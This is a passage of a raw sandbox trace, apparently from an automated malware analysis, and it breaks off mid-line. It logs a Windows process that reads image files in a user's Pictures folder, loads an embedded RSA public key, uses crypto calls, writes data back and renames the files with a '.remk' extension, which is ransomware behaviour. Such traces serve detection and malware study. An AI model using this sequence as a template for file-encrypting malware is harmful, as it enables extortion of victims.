HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc738 | out: hHeap=0x630000) returned 1 [0236.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0236.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0236.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.272] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf274, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.272] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.272] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.272] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.272] CloseHandle (hObject=0x640) returned 1 [0236.274] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\8PkInFTYY.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\8pkinftyy.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\8PkInFTYY.gif.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\8pkinftyy.gif.remk")) returned 1 [0236.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.275] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.277] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3646d10, ftCreationTime.dwHighDateTime=0x1d5dad2, ftLastAccessTime.dwLowDateTime=0x3a6b3550, ftLastAccessTime.dwHighDateTime=0x1d5dbd1, ftLastWriteTime.dwLowDateTime=0x3a6b3550, ftLastWriteTime.dwHighDateTime=0x1d5dbd1, nFileSizeHigh=0x0, nFileSizeLow=0x12b8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b1oXySBs7FK.jpg", cAlternateFileName="B1OXYS~1.JPG")) returned 1 [0236.277] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\b1oXySBs7FK.jpg") returned=".jpg" [0236.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\b1oXySBs7FK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\b1oxysbs7fk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.278] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=76685) returned 1 [0236.278] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.281] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12b67, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.282] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.283] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x12b8d, lpOverlapped=0x0) returned 1 [0236.285] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.285] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.285] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.285] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.286] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.286] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.286] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.286] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.286] GetLastError () returned 0x0 [0236.286] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.286] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.287] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.287] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.287] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x12b90) returned 0x37cf820 [0236.287] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce958 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc678 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce9a0 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc690 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc720 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6d8 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.288] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc720 | out: hHeap=0x630000) returned 1 [0236.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc720 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc6d8 [0236.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0236.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc6c0 [0236.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0236.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc720 | out: hHeap=0x630000) returned 1 [0236.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.289] GetCurrentThreadId () returned 0x314 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c56d0 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.290] GetCurrentThreadId () returned 0x314 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc720 [0236.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6d8 [0236.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc738 [0236.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc708 [0236.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6f0 [0236.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc750 [0236.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6f0 | out: hHeap=0x630000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc6f0 [0236.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc708 | out: hHeap=0x630000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0236.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc720 | out: hHeap=0x630000) returned 1 [0236.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0236.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc750 | out: hHeap=0x630000) returned 1 [0236.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0236.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0236.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6f0 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc738 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc690 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ce9a0 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.295] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x12b88, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, 